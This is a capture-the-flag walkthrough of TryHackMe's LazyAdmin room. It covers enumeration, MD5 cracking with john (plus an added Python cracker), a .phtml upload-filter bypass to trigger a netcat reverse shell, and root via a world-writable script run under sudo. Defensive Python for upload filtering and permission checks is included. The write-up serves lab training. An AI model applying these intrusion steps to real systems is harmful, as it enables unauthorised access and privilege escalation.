LazyAdmin — TryHackMe Walkthrough
Hello Everyone! Today I'll be doing the LazyAdmin room on TryHackMe.
Room Link: https://tryhackme.com/r/room/lazyadmin
Let’s get started!
First, we add the target's IP to /etc/hosts so we can refer to it as admin.ctf.
Step 0: Reconnaissance
We'll use Nmap (Network Mapper) to enumerate the open ports and services running on the target machine.
sudo nmap -sC -sV -oN logs/initial_nmap admin.ctf
- -sC — to run the default set of script scans for a target host.
- -sV — to enable version detection for target host.
- -oN — to save the output in normal format.
Brief
- 22/tcp — SSH (Secure Shell) — used for secure remote access. If we find a valid username and password, this gives us a login to the target machine.
- 80/tcp — HTTP server — running an Apache 2.4.18 web server.
Step 1: Web Discovery
Let's inspect the web server running on port 80.
It's the default Apache page, so let's check robots.txt for any entries.
No luck! Next we look for hidden directories on the web server. We'll use gobuster for this task.
gobuster dir -u http://admin.ctf/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
There's a /content directory, let's check it.
It's a SweetRice CMS site. We must enumerate this directory further to find something juicy.
gobuster dir -u http://admin.ctf/content -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
The /inc entry looks interesting.
Bingo! Directory listing is enabled, so we get an index of the application's files.
There's a MySQL backup file. Let's check it for credentials.
We get the username (manager) and a password hash. Let's crack it.
It's an MD5 hash. We'll use John the Ripper with rockyou.txt as our wordlist to crack the password.
john --format=raw-md5 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
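To show what john is doing under the hood for a raw (unsalted) MD5, here is an added example of the same dictionary attack written in Python. It is not code from the room or the original write-up; the wordlist, the helper names and the demo hash (the MD5 of "sunshine") are constructed for illustration, and the point is that an unsalted hash costs one MD5 computation per candidate, which is why rockyou.txt falls so quickly.

```python
import hashlib
from typing import Iterable, Optional

# Constructed stand-in for rockyou.txt (assumption: in a real run you would
# stream /usr/share/wordlists/rockyou.txt line by line instead).
WORDLIST = ["123456", "password", "sunshine", "letmein", "qwerty"]


def md5_hex(candidate: str) -> str:
    """Unsalted MD5 hex digest of a candidate password, as the dump stores it."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest()


def crack_md5(target_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: hash each candidate once and compare to the target.

    Because raw MD5 carries no salt, a single digest per candidate is enough;
    with a salted scheme every user would need a separate pass. The digest is
    compared case-insensitively since dumps mix upper and lower case hex.
    """
    target = target_hash.strip().lower()
    if len(target) != 32 or any(c not in "0123456789abcdef" for c in target):
        raise ValueError("not a raw MD5 hex digest")
    for word in wordlist:
        word = word.rstrip("\r\n")  # wordlist files carry line endings
        if md5_hex(word) == target:
            return word
    return None


def crack_from_file(target_hash: str, path: str) -> Optional[str]:
    """Same attack streaming a wordlist file (rockyou.txt is ~14M lines,
    so never load it into memory at once)."""
    with open(path, "r", encoding="latin-1", errors="ignore") as fh:
        return crack_md5(target_hash, fh)


if __name__ == "__main__":
    # Constructed demo target: the hash of "sunshine", not the hash from the room.
    demo_hash = md5_hex("sunshine")
    print(demo_hash, "->", crack_md5(demo_hash, WORDLIST))
```

For the real hash you would call crack_from_file with the digest from the backup and the path to rockyou.txt; john does the same work with optimised hashing and rule-based mangling on top.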
Easy catch! Now let's log in to the CMS dashboard at admin.ctf/content/as
Step 2: Getting the shell
Now that we have access to the CMS, we can upload a PHP reverse shell and get a foothold on the system.
It seems we can't upload files with a .php extension. Let's bypass this by changing the extension to .phtml: the filter only blocks .php, while Apache's PHP module also executes .phtml files.
And it works!
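Why the .phtml rename works, and what a correct upload filter looks like, as an added example in Python (not code from the CMS or the original post). The weak check mirrors the behaviour observed above, rejecting only ".php"; the hardened check uses an allowlist and also refuses any PHP-served extension appearing anywhere in the name. The regex copies the FilesMatch pattern that Debian/Ubuntu's stock php*-apache configuration ships, which is an assumption about the target's setup; the allowlist and function names are hypothetical.

```python
import os
import re

# Stock Debian/Ubuntu php*-apache config hands file names matching this pattern
# to the PHP interpreter, so ".phtml" and ".phar" run as code just like ".php".
# (Assumption: the target uses that stock config; the pattern is case-sensitive.)
PHP_HANDLER_RE = re.compile(r".+\.ph(ar|p|tml)$")
PHP_SERVED_EXTENSIONS = {".php", ".phtml", ".phar"}

# Hypothetical allowlist for an "attachment" upload feature.
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}


def served_as_php(filename: str) -> bool:
    """Would Apache execute this file name with the stock PHP handler?"""
    return PHP_HANDLER_RE.search(os.path.basename(filename)) is not None


def weak_upload_allowed(filename: str) -> bool:
    """Blocklist of the kind the CMS appears to use: reject only ".php"."""
    return not filename.lower().endswith(".php")


def hardened_upload_allowed(filename: str) -> bool:
    """Allowlist check: normalise the name, take the LAST extension, compare
    case-insensitively, and refuse anything not explicitly permitted."""
    # drop any directory component (handles both / and \ separators)
    name = os.path.basename(filename.replace("\\", "/"))
    # trailing dots/spaces are stripped by some filesystems, so strip them first
    name = name.rstrip(". ")
    if not name or name.startswith("."):        # empty or dotfile (e.g. .htaccess)
        return False
    _root, ext = os.path.splitext(name)
    if ext.lower() not in ALLOWED_EXTENSIONS:
        return False
    # defence in depth: no PHP-served extension in ANY segment, so
    # "shell.phtml.jpg" is refused even on servers that match every extension
    for part in name.lower().split(".")[1:]:
        if "." + part in PHP_SERVED_EXTENSIONS:
            return False
    return True


if __name__ == "__main__":
    for candidate in ("revshell.php", "revshell.phtml", "shell.phtml.jpg", "photo.JPG"):
        print(candidate, "weak:", weak_upload_allowed(candidate),
              "hardened:", hardened_upload_allowed(candidate),
              "runs as PHP:", served_as_php(candidate))
```

The bypass is exactly the gap between weak_upload_allowed and served_as_php: "revshell.phtml" passes the first and is true for the second. Extension checks alone are still not enough in a real application; the upload directory should also have PHP execution disabled and the stored file should be renamed to a server-chosen name.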
Let's start a netcat listener on our attack machine and send a request to the uploaded file using curl to trigger the reverse shell.
On attack machine:
nc -nlvp 9001
Open a new terminal and send a request to revshell.phtml.
curl http://admin.ctf/content/attachment/revshell.phtml
Bullseye!
Inside /home/itguy I found the first flag, user.txt.
Step 3: Privilege Escalation
Let's escalate our privileges to grab the root flag. Using the sudo -l command we can check which commands we are allowed to run as root.
We may execute the backup.pl script with root privileges. Let's abuse this configuration.
Weird! The Perl script just executes another script (copy.sh).
The copy.sh script makes a connection to an IP address using netcat, and luckily we have write access to this file. We can exploit this by starting another netcat listener on port 5554 and then changing the IP inside copy.sh to our own IP.
When backup.pl is executed with root privileges through sudo, it runs copy.sh as root, which connects back and gives us a root shell on our second netcat listener.
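The bug here is a root-run script that calls a second script anyone can edit. Below is an added example (not from the room or the original write-up) of the check a practitioner runs after sudo -l: extract the script paths a sudo-able script invokes and flag the ones that are world-writable. The file names, layout and contents of the demo tree are constructed in a temporary directory to mirror the backup.pl/copy.sh relationship; the real paths on the box are not reproduced here, and the regex is a simple heuristic rather than a Perl parser.

```python
import os
import re
import stat
import tempfile

# Absolute paths with a script-like extension, as they appear inside
# system("/path/x.sh"), backticks, or on a bare line of a shell script.
# Heuristic only: it does not parse Perl, it just finds path literals.
SCRIPT_PATH_RE = re.compile(r"(/[\w./-]+\.(?:sh|pl|py|rb))\b")


def referenced_scripts(script_path: str) -> list:
    """Unique script paths mentioned in the given file, sorted."""
    with open(script_path, "r", encoding="utf-8", errors="ignore") as fh:
        return sorted(set(SCRIPT_PATH_RE.findall(fh.read())))


def is_world_writable(path: str) -> bool:
    """True if the 'other' write bit is set (the copy.sh situation)."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & stat.S_IWOTH)


def writable_dependencies(script_path: str) -> list:
    """Scripts invoked by script_path that anyone can edit. If script_path is
    runnable as root via sudo, each hit is a root code-execution primitive."""
    return [p for p in referenced_scripts(script_path) if is_world_writable(p)]


def build_demo() -> dict:
    """Constructed layout mirroring the room: backup.pl calls copy.sh (mode 777)
    and a second, correctly-permissioned helper. Returns the paths used."""
    d = tempfile.mkdtemp(prefix="lazyadmin-demo-")
    copy_sh = os.path.join(d, "copy.sh")
    rotate_sh = os.path.join(d, "rotate.sh")
    backup_pl = os.path.join(d, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write("#!/bin/bash\n# placeholder for the netcat call-out\n")
    with open(rotate_sh, "w") as fh:
        fh.write("#!/bin/bash\n# placeholder for an innocuous helper\n")
    with open(backup_pl, "w") as fh:
        fh.write('#!/usr/bin/perl\nsystem("%s");\nsystem("%s");\n' % (copy_sh, rotate_sh))
    os.chmod(copy_sh, 0o777)    # world-writable: the misconfiguration
    os.chmod(rotate_sh, 0o755)  # correctly locked down
    return {"backup": backup_pl, "copy": copy_sh, "rotate": rotate_sh}


if __name__ == "__main__":
    demo = build_demo()
    for hit in writable_dependencies(demo["backup"]):
        print("world-writable dependency of a sudo-able script:", hit)
```

In practice you would run writable_dependencies against each entry sudo -l reports. The check uses only the world-write bit so the result is the same whoever runs it; swapping in os.access(path, os.W_OK) would also catch files writable by your own user or group, which is just as exploitable. The fix on the defending side is the mirror image: scripts reachable from sudo rules must be owned by root and not writable by anyone else.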
On the first netcat shell, we run backup.pl with sudo; on the second netcat shell, the root shell lands.
And the machine has been successfully pwned!
Conclusion
LazyAdmin is an easy-rated room that requires knowledge of basic target enumeration, website enumeration, hash cracking, file-upload filter bypass and abuse of a sudo-runnable script with a writable dependency.
Despite the easy rating, it calls for intermediate-level pentesting skills to complete.